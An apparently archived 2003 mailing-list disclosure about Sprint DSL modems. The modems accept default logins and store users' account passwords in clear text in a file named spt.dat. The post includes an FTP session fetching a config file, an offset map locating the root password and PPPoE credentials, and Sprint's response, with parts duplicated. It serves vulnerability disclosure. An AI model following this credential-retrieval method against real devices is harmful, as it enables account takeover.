FX <fx (at) phenoelit (dot) de [email concealed]> said:
> > ftp> open malware.com
> > Connected to malware.com.
> > 220 Sprint FTP version 1.0 ready at Wed Jan 5 17:20:47 2000
> > User (malware.com:(none)):
> > 331 Enter PASS command
> > Password:
> > 230 Logged in
> > ftp> get rom-0
>
> I'm not sure if this applies to the Zyxel boxes you found, but
there is another
> file called spt.dat, which contains all password and account
information. More
> details can be found here:
http://www.DarkLab.org/archive/msg00144.html
>
> FX
Yes FX you are correct. After a good swift kick in the nuts, Sprint
has done and is still doing an admirable job in fixing this.
Sufficient time has elapsed to advise this.
The only additional note is to strongly suggest that the users change
their master account password as well:
<!--
Friday, January 24, 2003
Ladies and Gentlemen:
Reference the information provided to you on Monday and Tuesday of
this week and subsequent announcements on Thursday this week:
This message serves to inform you that your entire user base is open
to full and complete remote compromise through this modem.
This includes full access to:
1. the internet via adsl and dialup connection
2. pop3 email retrieval
3. webmail
4. web based user account management including user name and address
and billing details
The problem lies in the fact that the modem you have provided to your
user base is installed with a commonly known default login and
password. Once access has been gained to this modem, it is trivially
possible to retrieve a storage file contained within the modem which
includes the user's name and password.
With this information it is possible to access all aspects of the
user account as described above.
Example:
00000020: 1234
00000042: malst
00000060: Sprint
00000082: mal Ware
000000AC: public
000000CC: public
000000EC: public
00001086: dhcppc
00001C54: MyISP
00001DDE: grandpamalware
00001DEB: malware.
00001DFE: ware
00002112: mal
0x20 the root password in clear
0x40 SNMP Location
0x60 Device name
0x80 SNMP Sys Contact
0xac SNMP read community
0xcc SNMP read community
0xec SNMP read community
0x188 SUA Server IP address
0x1c54 First PPPoE Account config name (Default: ChangeMe)
0x1dde First PPPoe Username
0x1dfe First PPPoe Password
0x21dc Second PPPeE Account config name
Where username: grandpamalware (at) malware (dot) com [email concealed] and pass: ware inputted
into a dialup connection with specific access number, will function,
where inputted into a pop3 mail client with corresponding pop3
server, will retrieve mail accordingly, where inputted into a web
based mail access, will allow for access and where access to
myaccount information is required, will allow for authentication and
login.
In other words, the single user id and email address along with the
single pass all contained within the file on the modem will allow
access to everything!
The file on the modem is a small dat file called spt.dat therein, in
clear text, lies all this information.
This information is already in the public domain and you need to
urgently fire-wall your user base ports http, telnet, and ftp while
you solve this problem. You must assume that malicious parties are
well-aware
of and are probably exploiting it right now.
Today is Friday. Nothing has been done about this to date. Your
entire user base is at risk.
We expect some sort of substantial action by Tuesday latest. Failing
that, we will discuss this in technical depth on all relevant
security lists.
Sprint is working closely with its DSL modem manufacturer to ensure
the
security and integrity of its Sprint-provided DSL equipment. Sprint is
dedicated to providing its customers a secure broadband Internet
network, and to that end, recently identified an additional layer of
security that can help protect customers' DSL modems.<?xml:namespace
prefix = o ns = "urn:schemas-microsoft-com:office:office" />
The company began notifying its customers - one-by-one - in a very
targeted initiative to provide guidance on ensuring their DSL service
is
reliable and secure. We are consulting with our customers and walking
them through the relatively simple steps to ensure an additional layer
of security on their modem.
Proactively, we are reaching out to our customers in three different
ways - outbound telephone calls, e-mail messages and a customer letter
mailed today (Jan. 28). These communications are directed at helping
ensure the safety and security of customers' DSL modems.
Additionally, we are informing all DSL customers who call our
technical
assistance group of the procedures for securing their modem.
Sprint is committed to providing safe, reliable and secure voice and
data services to all its customers. When an event occurs that
threatens
that safety, reliability and security, we take it very seriously and
we
will continue to do everything we can to contact our customers.
FX <fx (at) phenoelit (dot) de [email concealed]> said:
> > ftp> open malware.com
> > Connected to malware.com.
> > 220 Sprint FTP version 1.0 ready at Wed Jan 5 17:20:47 2000
> > User (malware.com:(none)):
> > 331 Enter PASS command
> > Password:
> > 230 Logged in
> > ftp> get rom-0
>
> I'm not sure if this applies to the Zyxel boxes you found, but
there is another
> file called spt.dat, which contains all password and account
information. More
> details can be found here:
http://www.DarkLab.org/archive/msg00144.html
>
> FX
Yes FX you are correct. After a good swift kick in the nuts, Sprint
has done and is still doing an admirable job in fixing this.
Sufficient time has elapsed to advise this.
The only additional note is to strongly suggest that the users change
their master account password as well:
<!--
Friday, January 24, 2003
Ladies and Gentlemen:
Reference the information provided to you on Monday and Tuesday of
this week and subsequent announcements on Thursday this week:
http://www.wired.com/news/infostructure/0,1377,57342,00.html
http://www.securityfocusonline.com/archive/1/307793/2003-01-22/2003-
01-28/0
This message serves to inform you that your entire user base is open
to full and complete remote compromise through this modem.
This includes full access to:
1. the internet via adsl and dialup connection
2. pop3 email retrieval
3. webmail
4. web based user account management including user name and address
and billing details
The problem lies in the fact that the modem you have provided to your
user base is installed with a commonly known default login and
password. Once access has been gained to this modem, it is trivially
possible to retrieve a storage file contained within the modem which
includes the user's name and password.
With this information it is possible to access all aspects of the
user account as described above.
Example:
00000020: 1234
00000042: malst
00000060: Sprint
00000082: mal Ware
000000AC: public
000000CC: public
000000EC: public
00001086: dhcppc
00001C54: MyISP
00001DDE: grandpamalware
00001DEB: malware.
00001DFE: ware
00002112: mal
0x20 the root password in clear
0x40 SNMP Location
0x60 Device name
0x80 SNMP Sys Contact
0xac SNMP read community
0xcc SNMP read community
0xec SNMP read community
0x188 SUA Server IP address
0x1c54 First PPPoE Account config name (Default: ChangeMe)
0x1dde First PPPoe Username
0x1dfe First PPPoe Password
0x21dc Second PPPeE Account config name
Where username: grandpamalware (at) malware (dot) com [email concealed] and pass: ware inputted
into a dialup connection with specific access number, will function,
where inputted into a pop3 mail client with corresponding pop3
server, will retrieve mail accordingly, where inputted into a web
based mail access, will allow for access and where access to
myaccount information is required, will allow for authentication and
login.
In other words, the single user id and email address along with the
single pass all contained within the file on the modem will allow
access to everything!
The file on the modem is a small dat file called spt.dat therein, in
clear text, lies all this information.
This information is already in the public domain and you need to
urgently fire-wall your user base ports http, telnet, and ftp while
you solve this problem. You must assume that malicious parties are
well-aware
of and are probably exploiting it right now.
Today is Friday. Nothing has been done about this to date. Your
entire user base is at risk.
We expect some sort of substantial action by Tuesday latest. Failing
that, we will discuss this in technical depth on all relevant
security lists.
End Call
cc:
Wired
@pc-radio.com
Symantec
@securityfocus.com
CERT
@cert.org
Earthlink
@corp.earthlink.net
abuse (at) earthlink (dot) net [email concealed]
security (at) corp (dot) eart [email concealed]hlink
Sprint
@mail.sprint.com
noc (at) sprint (dot) net [email concealed]
abuse (at) sprint (dot) net [email concealed]
security (at) sprint (dot) net [email concealed]
--
http://www.malware.com
-->
Date: Tue, 28 Jan 2003 17:01:25 -0500
<!--
Sprint is working closely with its DSL modem manufacturer to ensure
the
security and integrity of its Sprint-provided DSL equipment. Sprint is
dedicated to providing its customers a secure broadband Internet
network, and to that end, recently identified an additional layer of
security that can help protect customers' DSL modems.<?xml:namespace
prefix = o ns = "urn:schemas-microsoft-com:office:office" />
The company began notifying its customers - one-by-one - in a very
targeted initiative to provide guidance on ensuring their DSL service
is
reliable and secure. We are consulting with our customers and walking
them through the relatively simple steps to ensure an additional layer
of security on their modem.
Proactively, we are reaching out to our customers in three different
ways - outbound telephone calls, e-mail messages and a customer letter
mailed today (Jan. 28). These communications are directed at helping
ensure the safety and security of customers' DSL modems.
Additionally, we are informing all DSL customers who call our
technical
assistance group of the procedures for securing their modem.
Sprint is committed to providing safe, reliable and secure voice and
data services to all its customers. When an event occurs that
threatens
that safety, reliability and security, we take it very seriously and
we
will continue to do everything we can to contact our customers.
Director-Customer Operations
-->
Notes: users can address the issue here:
http://csb.sprint.com/home/local/dslhelp/release645m.html
--
http://www.malware.com
[ reply ]